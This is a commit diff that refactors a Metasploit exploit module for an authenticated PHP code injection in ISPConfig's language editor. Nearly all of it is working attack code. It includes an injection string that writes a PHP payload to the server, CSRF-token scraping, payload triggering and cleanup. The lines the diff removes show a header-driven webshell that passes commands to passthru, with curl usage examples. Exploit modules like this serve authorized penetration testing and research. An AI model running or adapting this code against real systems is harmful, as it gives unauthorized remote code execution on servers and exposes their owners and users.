resolved: issues

happybear-21 · happybear-21 · commit 016f4ea14207 · 2025-06-26T10:26:05.000+05:30
diff --git a/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb b/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
@@ -58,21 +58,16 @@ def initialize(info = {})
       OptString.new('USERNAME', [true, 'ISPConfig administrator username']),
       OptString.new('PASSWORD', [true, 'ISPConfig administrator password'])
     ])
-
-    register_advanced_options([
-      OptInt.new('LOGIN_TIMEOUT', [true, 'Timeout for login request', 15]),
-      OptBool.new('DELETE_SHELL', [true, 'Delete webshell after session', true])
-    ])
   end
 
   def check
-    print_status('Checking if target is ISPConfig...')
+    print_status('Checking if the target is ISPConfig...')
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'login', '')
+      'uri' => normalize_uri(target_uri.path, 'login')
     })
     return CheckCode::Unknown unless res
-    if res.body.include?('ISPConfig') || res.body.include?('ispconfig')
+    if res.body.include?('ISPConfig') && (res.body.include?('login') || res.body.include?('username') || res.body.include?('password'))
       print_good('ISPConfig installation detected')
       return CheckCode::Detected
     end
@@ -83,14 +78,14 @@ def authenticate
     print_status("Attempting login with username '#{datastore['USERNAME']}' and password '#{datastore['PASSWORD']}'")
     res = send_request_cgi({
       'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'login', ''),
+      'uri' => normalize_uri(target_uri.path, 'login'),
       'vars_post' => {
         'username' => datastore['USERNAME'],
         'password' => datastore['PASSWORD'],
         's_mod' => 'login'
       },
       'keep_cookies' => true
-    }, datastore['LOGIN_TIMEOUT'])
+    })
     fail_with(Failure::NoAccess, 'Login request failed') unless res
     if res.body.match(/Username or Password wrong/i)
       fail_with(Failure::NoAccess, 'Login failed: Invalid credentials')
@@ -104,24 +99,12 @@ def authenticate
     true
   end
 
-  def generate_random_string(length = 10)
-    charset = ('a'..'z').to_a
-    Array.new(length) { charset.sample }.join
-  end
-
-  def generate_shell_code
-    print_status('Generating PHP payload...')
+  def inject_payload
+    print_status('Injecting PHP payload...')
+    @payload_file = "#{Rex::Text.rand_text_alpha_lower(8)}.php"
     php_payload = payload.encoded
-    php_shell = %Q{<?php\nprint('____SHELL_START____');\nif(isset($_SERVER['HTTP_CMD'])) {\n  $cmd = base64_decode($_SERVER['HTTP_CMD']);\n  if($cmd == 'PAYLOAD_TRIGGER') {\n    #{php_payload}\n  } elseif($cmd) {\n    passthru($cmd);\n  }\n} else {\n  #{php_payload}\n}\nprint('____SHELL_END____');\n?>}
-    Rex::Text.encode_base64(php_shell)
-  end
-
-  def inject_shell
-    print_status('Injecting PHP shell...')
-    @shell_file = "sh_#{generate_random_string}.php"
-    php_code = generate_shell_code
-    injection = "'];file_put_contents('#{@shell_file}',base64_decode('#{php_code}'));die;#"
-    lang_file = generate_random_string + ".lng"
+    injection = "'];file_put_contents('#{@payload_file}','<?php #{php_payload} ?>');die;#"
+    lang_file = Rex::Text.rand_text_alpha_lower(10) + ".lng"
     edit_url = normalize_uri(target_uri.path, 'admin', 'language_edit.php')
     initial_data = {
       'lang' => 'en',
@@ -133,7 +116,7 @@ def inject_shell
       'uri' => edit_url,
       'vars_post' => initial_data,
       'keep_cookies' => true
-    }, 10)
+    })
     fail_with(Failure::UnexpectedReply, 'Unable to access language_edit.php') unless res
     csrf_id_match = res.body.match(/_csrf_id" value="([^"]+)"/)
     csrf_key_match = res.body.match(/_csrf_key" value="([^"]+)"/)
@@ -142,7 +125,7 @@ def inject_shell
     end
     csrf_id = csrf_id_match[1]
     csrf_key = csrf_key_match[1]
-    print_good("CSRF tokens extracted: ID=#{csrf_id[0..10]}..., KEY=#{csrf_key[0..10]}...")
+    print_good("Extracted CSRF tokens: ID=#{csrf_id[0..10]}..., KEY=#{csrf_key[0..10]}...")
     injection_data = {
       'lang' => 'en',
       'module' => 'help',
@@ -156,82 +139,77 @@ def inject_shell
       'uri' => edit_url,
       'vars_post' => injection_data,
       'keep_cookies' => true
-    }, 10)
+    })
     fail_with(Failure::UnexpectedReply, 'Injection request failed') unless res
-    shell_url = normalize_uri(target_uri.path, 'admin', @shell_file)
-    print_status('Verifying shell injection...')
+    payload_url = normalize_uri(target_uri.path, 'admin', @payload_file)
+    print_good("Payload successfully injected: #{@payload_file}")
+    return payload_url
+  end
+
+  def trigger_payload(payload_url)
+    print_status('Triggering PHP payload...')
+    # Small delay to ensure the file is written
+    sleep(1)
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => shell_url,
+      'uri' => payload_url,
       'keep_cookies' => true
-    }, 5)
-    if res && res.body.include?('SHELL_START') && res.body.include?('SHELL_END')
-      print_good("Shell successfully injected: #{@shell_file}")
-      register_file_for_cleanup(@shell_file) if datastore['DELETE_SHELL']
-      return shell_url
+    })
+    if res && res.code == 200
+      print_good('PHP payload triggered successfully')
     else
-      fail_with(Failure::UnexpectedReply, 'Shell injection failed or shell not accessible')
+      print_warning('Payload trigger response was unexpected')
     end
   end
 
-  def execute_command(command, shell_uri = nil)
-    return nil unless @shell_file
-    shell_url = shell_uri || normalize_uri(target_uri.path, 'admin', @shell_file)
-    encoded_cmd = Rex::Text.encode_base64(command)
+  def cleanup
+    return unless @payload_file
+    print_status('Cleaning up payload file...')
+    # Use the same vulnerability to delete the file
+    injection = "'];unlink('#{@payload_file}');die;#"
+    lang_file = Rex::Text.rand_text_alpha_lower(10) + ".lng"
+    edit_url = normalize_uri(target_uri.path, 'admin', 'language_edit.php')
+    initial_data = {
+      'lang' => 'en',
+      'module' => 'help',
+      'lang_file' => lang_file
+    }
     res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => shell_url,
-      'headers' => {
-        'CMD' => encoded_cmd
-      },
+      'method' => 'POST',
+      'uri' => edit_url,
+      'vars_post' => initial_data,
       'keep_cookies' => true
-    }, 15)
-    return nil unless res
-    output_match = res.body.match(/____SHELL_START____(.*?)____SHELL_END____/m)
-    return output_match[1] if output_match
-    nil
-  end
-
-  def trigger_payload(shell_uri)
-    print_status('Triggering PHP payload...')
-    framework.threads.spawn('PayloadTrigger', false) do
-      send_request_cgi({
-        'method' => 'GET',
-        'uri' => shell_uri,
-        'keep_cookies' => true
-      }, 10)
-    end
-    framework.threads.spawn('PayloadTriggerManual', false) do
-      select(nil, nil, nil, 2)
-      execute_command('PAYLOAD_TRIGGER', shell_uri)
-    end
-    print_good('PHP payload triggered')
+    })
+    return unless res
+    csrf_id_match = res.body.match(/_csrf_id" value="([^"]+)"/)
+    csrf_key_match = res.body.match(/_csrf_key" value="([^"]+)"/)
+    return unless csrf_id_match && csrf_key_match
+    csrf_id = csrf_id_match[1]
+    csrf_key = csrf_key_match[1]
+    injection_data = {
+      'lang' => 'en',
+      'module' => 'help',
+      'lang_file' => lang_file,
+      '_csrf_id' => csrf_id,
+      '_csrf_key' => csrf_key,
+      'records[\\]' => injection
+    }
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => edit_url,
+      'vars_post' => injection_data,
+      'keep_cookies' => true
+    })
+    print_good("Payload file #{@payload_file} cleaned up")
   end
 
   def exploit
     authenticate
-    shell_uri = inject_shell
+    payload_url = inject_payload
     print_status('Starting payload handler...')
-    trigger_payload(shell_uri)
-    print_status('Waiting for session...')
-    select(nil, nil, nil, 5)
-    if framework.sessions.length == 0
-      print_warning('No session established automatically')
-      print_status('Testing shell functionality...')
-      output = execute_command('id', shell_uri)
-      if output
-        print_good("Shell responsive: #{output.strip}")
-        print_line("\n" + '=' * 60)
-        print_status('Shell Access Information:')
-        print_line("URL: #{full_uri}#{shell_uri}")
-        print_line("Usage: Send base64 encoded commands via 'CMD' HTTP header")
-        print_line("Manual trigger: curl '#{full_uri}#{shell_uri}'")
-        print_line("Command example: curl -H 'CMD: #{Rex::Text.encode_base64('id')}' '#{full_uri}#{shell_uri}'")
-        print_line('=' * 60)
-      else
-        print_error('Shell test failed')
-        print_line("Manual test: curl '#{full_uri}#{shell_uri}'")
-      end
-    end
+    trigger_payload(payload_url)
+    print_status('Manual trigger information:')
+    print_line("URL: #{full_uri}#{payload_url}")
+    print_line("Manual trigger: curl '#{full_uri}#{payload_url}'")
   end
 end 
